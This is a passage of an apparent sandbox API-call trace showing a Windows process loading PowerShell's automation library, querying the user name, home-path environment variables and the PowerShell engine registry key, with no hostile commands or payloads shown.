lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.021] GetLastError () returned 0xcb [0051.021] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x19e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0051.021] GetLastError () returned 0xcb [0051.021] SetErrorMode (uMode=0x1) returned 0x1 [0051.021] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x19e58c | out: lpFileInformation=0x19e58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0051.021] GetLastError () returned 0xcb [0051.021] SetErrorMode (uMode=0x1) returned 0x1 [0051.021] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x19e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0051.021] GetLastError () returned 0xcb [0051.021] SetErrorMode (uMode=0x1) returned 0x1 [0051.021] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x19e58c | out: lpFileInformation=0x19e58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0051.021] GetLastError () returned 0xcb [0051.021] SetErrorMode (uMode=0x1) returned 0x1 [0051.021] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x19e120, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0051.022] GetLastError () returned 0xcb [0051.022] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x19e0bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0051.022] GetLastError () returned 0xcb [0051.022] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x19e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0051.022] GetLastError () returned 0xcb [0051.022] SetErrorMode (uMode=0x1) returned 0x1 [0051.022] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x19e58c | out: lpFileInformation=0x19e58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.022] GetLastError () returned 0xcb [0051.022] SetErrorMode (uMode=0x1) returned 0x1 [0051.022] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x19e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0051.022] GetLastError () returned 0xcb [0051.022] SetErrorMode (uMode=0x1) returned 0x1 [0051.022] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x19e58c | out: lpFileInformation=0x19e58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.022] GetLastError () returned 0xcb [0051.022] SetErrorMode (uMode=0x1) returned 0x1 [0051.022] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x19e120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0051.022] GetLastError () returned 0xcb [0051.022] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x19e0bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0051.022] GetLastError () returned 0xcb [0051.022] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.022] GetLastError () returned 0xcb [0051.022] SetErrorMode (uMode=0x1) returned 0x1 [0051.022] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x19e58c | out: lpFileInformation=0x19e58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.022] GetLastError () returned 0xcb [0051.022] SetErrorMode (uMode=0x1) returned 0x1 [0051.022] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e10c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.023] GetLastError () returned 0xcb [0051.023] SetErrorMode (uMode=0x1) returned 0x1 [0051.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x19e58c | out: lpFileInformation=0x19e58c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.023] GetLastError () returned 0xcb [0051.023] SetErrorMode (uMode=0x1) returned 0x1 [0051.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e120, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.023] GetLastError () returned 0xcb [0051.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x19e0bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.023] GetLastError () returned 0xcb [0051.024] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x19e1dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0051.024] GetLastError () returned 0xcb [0051.024] SetErrorMode (uMode=0x1) returned 0x1 [0051.024] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x2e35fe0 | out: lpFileInformation=0x2e35fe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1665760, ftLastAccessTime.dwHighDateTime=0x1d5fc35, ftLastWriteTime.dwLowDateTime=0xf1665760, ftLastWriteTime.dwHighDateTime=0x1d5fc35, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0051.024] GetLastError () returned 0xcb [0051.024] SetErrorMode (uMode=0x1) returned 0x1 [0051.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.025] GetLastError () returned 0xcb [0051.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.025] GetLastError () returned 0xcb [0051.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.025] GetLastError () returned 0xcb [0051.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.025] GetLastError () returned 0xcb [0051.043] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x247ac0, nSize=0x19e778 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x19e778) returned 0x1 [0051.044] GetLastError () returned 0xcb [0051.044] GetUserNameW (in: lpBuffer=0x247300, pcbBuffer=0x19e780 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x19e780) returned 1 [0051.045] ReportEventW (hEventLog=0x4aa0004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e56c88*="Available", lpRawData=0x2e56b44) returned 1 [0051.045] GetLastError () returned 0x0 [0051.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.046] GetLastError () returned 0xcb [0051.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.047] GetLastError () returned 0xcb [0051.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e258, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.064] GetLastError () returned 0xcb [0051.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.064] GetLastError () returned 0xcb [0051.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.064] GetLastError () returned 0xcb [0051.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.073] GetLastError () returned 0xcb [0051.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.073] GetLastError () returned 0xcb [0051.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.074] GetLastError () returned 0xcb [0051.074] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0051.074] GetLastError () returned 0xcb [0051.074] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0051.074] GetLastError () returned 0xcb [0051.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.074] GetLastError () returned 0xcb [0051.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.074] GetLastError () returned 0xcb [0051.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.074] GetLastError () returned 0xcb [0051.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.074] GetLastError () returned 0xcb [0051.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.074] GetLastError () returned 0xcb [0051.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.074] GetLastError () returned 0xcb [0051.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.074] GetLastError () returned 0xcb [0051.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.074] GetLastError () returned 0xcb [0051.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.075] GetLastError () returned 0xcb [0051.075] GetCurrentProcessId () returned 0x3b4 [0051.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.075] GetLastError () returned 0xcb [0051.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.075] GetLastError () returned 0xcb [0051.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.075] GetLastError () returned 0xcb [0051.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.075] GetLastError () returned 0xcb [0051.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.075] GetLastError () returned 0xcb [0051.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.075] GetLastError () returned 0xcb [0051.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.076] GetLastError () returned 0xcb [0051.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.076] GetLastError () returned 0xcb [0051.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.076] GetLastError () returned 0xcb [0051.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.076] GetLastError () returned 0xcb [0051.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.076] GetLastError () returned 0xcb [0051.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.076] GetLastError () returned 0xcb [0051.076] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e70c | out: phkResult=0x19e70c*=0x358) returned 0x0 [0051.076] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e754, lpData=0x0, lpcbData=0x19e750*=0x0 | out: lpType=0x19e754*=0x1, lpData=0x0, lpcbData=0x19e750*=0x56) returned 0x0 [0051.077] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e754, lpData=0x247300, lpcbData=0x19e750*=0x56 | out: lpType=0x19e754*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e750*=0x56) returned 0x0 [0051.077] RegCloseKey (hKey=0x358) returned 0x0 [0051.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.077] GetLastError () returned 0xcb [0051.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.077] GetLastError () returned 0xcb [0051.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.077] GetLastError () returned 0xcb [0051.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.078] GetLastError () returned 0xcb [0051.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e194, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.078] GetLastError () returned 0xcb [0051.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19e194, lpFilePart=0x0 | out: 